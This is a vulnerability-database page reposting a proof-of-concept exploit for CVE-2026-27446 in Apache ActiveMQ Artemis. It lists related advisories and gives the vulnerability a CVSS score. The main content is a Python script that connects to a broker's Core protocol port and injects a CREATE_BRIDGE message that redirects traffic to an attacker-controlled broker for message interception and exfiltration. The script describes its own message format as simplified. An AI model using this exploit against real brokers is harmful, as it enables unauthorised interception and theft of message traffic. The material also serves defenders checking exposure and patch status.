Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Apache Artemis / ActiveMQ Artemis Missing Authentication

🗓️ 06 Mar 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 139 Views

Artemis Core protocol allows unauthenticated bridges enabling traffic redirection and exfiltration.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2026-27446
4 Mar 202608:48
attackerkb
ATTACKERKB		CVE-2026-4649
24 Mar 202608:15
attackerkb
Tenable Nessus		Apache Artemis 2.11.0 < 2.45.0 / 2.50.0 < 2.52.0 Missing Authentication (CVE-2026-27446)
6 Mar 202600:00
nessus
Tenable Nessus		RHEL 8 : Red Hat JBoss Enterprise Application Platform 8.1.6 (RHSA-2026:18054)
18 May 202600:00
nessus
Tenable Nessus		RHEL 9 : Red Hat JBoss Enterprise Application Platform 8.1.6 (RHSA-2026:18055)
18 May 202600:00
nessus
Tenable Nessus		Linux Distros Unpatched Vulnerability : CVE-2026-27446
6 Mar 202600:00
nessus
Tenable Nessus		Linux Distros Unpatched Vulnerability : CVE-2026-4649
25 Mar 202600:00
nessus
Chainguard		CVE-2026-27446 vulnerabilities
21 May 202619:18
cgr
Circl		CVE-2026-27446
3 Mar 202617:42
circl
CNNVD		Apache ActiveMQ Artemis和Apache Artemis 安全漏洞
4 Mar 202600:00
cnnvd
Rows per page
=============================================================================================================================================
    | # Title     : Apache ActiveMQ Artemis Unauthorized Bridge Injection via Core Protocol                                                     |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://artemis.apache.org/components/artemis/                                                                              |
    =============================================================================================================================================
    
    [+] Summary    : PoC CVE-2026-27446 targeting the Core protocol of Apache ActiveMQ Artemis on its default port 61616.
    
    The code:
    
    Establishes a raw TCP connection to the target broker.
    
    Sends a minimal ARTEMIS handshake to verify Core protocol support.
    
    Attempts to inject a simplified CREATE_BRIDGE control message that redirects traffic to a rogue broker.
    
    If the broker is misconfigured (e.g., security disabled or management permissions improperly restricted), an attacker could potentially create a bridge without authentication, resulting in:
    
    Message interception
    
    Traffic redirection
    
    Data exfiltration
    
    Broker trust abuse
    
    [+] Affected Versions
    
    Apache Artemis: 2.50.0 → 2.51.0
    
    Apache ActiveMQ Artemis: 2.11.0 → 2.44.0
    
    [+] Fixed in: Apache Artemis 2.52.0
    			  
    [+] POC   :  
    
    import socket
    import struct
    
    TARGET_IP = "192.168.1.100"  
    TARGET_PORT = 61616           
    ATTACKER_IP = "192.168.1.50"  
    
    def create_core_packet(payload):
        """Wraps the data in the Core protocol format (Length + Data)"""
        return struct.pack('>I', len(payload)) + payload
    
    def check_vulnerability():
        try:
            print(f"[*] Connecting to {TARGET_IP}:{TARGET_PORT}...")
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            sock.connect((TARGET_IP, TARGET_PORT))
            handshake = b"ARTEMIS" + struct.pack('>I', 1) 
            sock.send(handshake)
            
            response = sock.recv(1024)
            if b"ARTEMIS" not in response:
                print("[-] Target does not seem to support Artemis Core protocol.")
                return
    
            print("[+] Handshake successful. Target supports Core protocol.")        
            print(f"[*] Sending malicious Bridge redirection to {ATTACKER_IP}...")
            evil_payload = f"CREATE_BRIDGE;name=exploit;uri=tcp://{ATTACKER_IP}:61616;queue=ANY".encode()
            sock.send(create_core_packet(evil_payload))
    
            print("[!] Packet sent. Monitor your rogue broker for incoming connections.")
            
        except Exception as e:
            print(f"[!] Error: {e}")
        finally:
            sock.close()
    
    if __name__ == "__main__":
        check_vulnerability()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Mar 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.8
CVSS 49.3
EPSS0.08341
SSVC
Artemis Core protocolunauthenticated bridgestraffic redirectiondata exfiltrationdefault portport 61616Apache Artemisbridge injectionauthentication bypass
139